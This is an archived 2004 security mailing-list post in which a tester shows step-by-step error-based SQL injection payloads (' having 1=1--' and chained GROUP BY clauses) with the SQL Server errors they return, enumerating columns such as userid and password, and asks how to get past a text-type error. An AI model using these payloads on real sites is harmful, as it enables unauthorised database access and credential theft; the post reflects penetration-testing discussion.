Re: Hacme Bank

From: KrK (krk41@yahoo.com)
Date: Fri Sep 17 2004 - 08:37:53 EDT

• Next message: Ken Schaefer: "Re: (Asp.Net Full Trust Vulnerabilities) RE: Apache VS IIS Security model question"
• Previous message: Bénoni MARTIN: "RE: Web Application Tester"
• Maybe in reply to: Mark Curphey: "Hacme Bank"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Hi List,
I have been doing testing of a web site and have
found all the errors as detailed in the advanced
sql injection paper by ngsoftware and in Hacme
bank.
 
I have been stuck on the way because of a
different error and am unable to enumerate the
database further. Here is the list of tests that
i have done and the corresponding output, if anyone
could suggest on how to enumerate the rest of the
table fields it would be great.
 
step 1: userid='%20having%201%3d1%2d%2d
 (encoded form of ' having 1=1--)
result 1:
Column 'logindetls.userid' is invalid in the
select list because it is not contained in an
aggregate function and there is no GROUP BY clause.

step
2:'%20GROUP%20BY%20logindetls.userid%20having%201=1--
result 2:
Column 'logindetls.password' is invalid in the
select list because it is not contained in either
an aggregate function or the GROUP BY clause.

step
3:userid='%20GROUP%20BY%20logindetls.userid,logindetls.password%20having%201=1--

result 3:
Column 'logindetls.name' is invalid in the select
list because it is not contained in either an
aggregate function or the GROUP BY clause.
 
and so on and so forth until i reach a point
where i get this error:

[Microsoft][ODBC SQL Server Driver][SQL
Server]:the text, ntext, and image data types
cannot be compared or sorted, except when using IS
NULL or LIKE operator

The application, i feel, stores text data in one of
the fields which results in the generation of this
error.Has anyone in the list come across this?
any clues on how to enumerate the database further?
Thanking you,
Krk

" DON'T WORRY BE HAPPY,
  EVERY NIGHT YOU HAVE SOME TROUBLE,
  IF YOU WORRY YOU MAKE IT DOUBLE,
  SO DON'T WORRY BE HAPPY NOW...."

=====
" DON'T WORRY BE HAPPY,
     EVERY NIGHT YOU HAVE SOME TROUBLE,
     IF YOU WORRY YOU MAKE IT DOUBLE,
     SO DON'T WORRY BE HAPPY NOW...."

                
__________________________________
Do you Yahoo!?
Yahoo! Mail is new and improved - Check it out!
http://promotions.yahoo.com/new_mail

------------------------------------------------------------------------------
Ethical Hacking at the InfoSec Institute. All of our class sizes are
guaranteed to be 12 students or less to facilitate one-on-one interaction
with one of our expert instructors. Check out our Advanced Hacking course,
learn to write exploits and attack security infrastructure. Attend a course
taught by an expert instructor with years of in-the-field pen testing
experience in our state of the art hacking lab. Master the skills of an
Ethical Hacker to better assess the security of your organization.

http://www.infosecinstitute.com/courses/ethical_hacking_training.html
-------------------------------------------------------------------------------

• Next message: Ken Schaefer: "Re: (Asp.Net Full Trust Vulnerabilities) RE: Apache VS IIS Security model question"
• Previous message: Bénoni MARTIN: "RE: Web Application Tester"
• Maybe in reply to: Mark Curphey: "Hacme Bank"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:54:05 EDT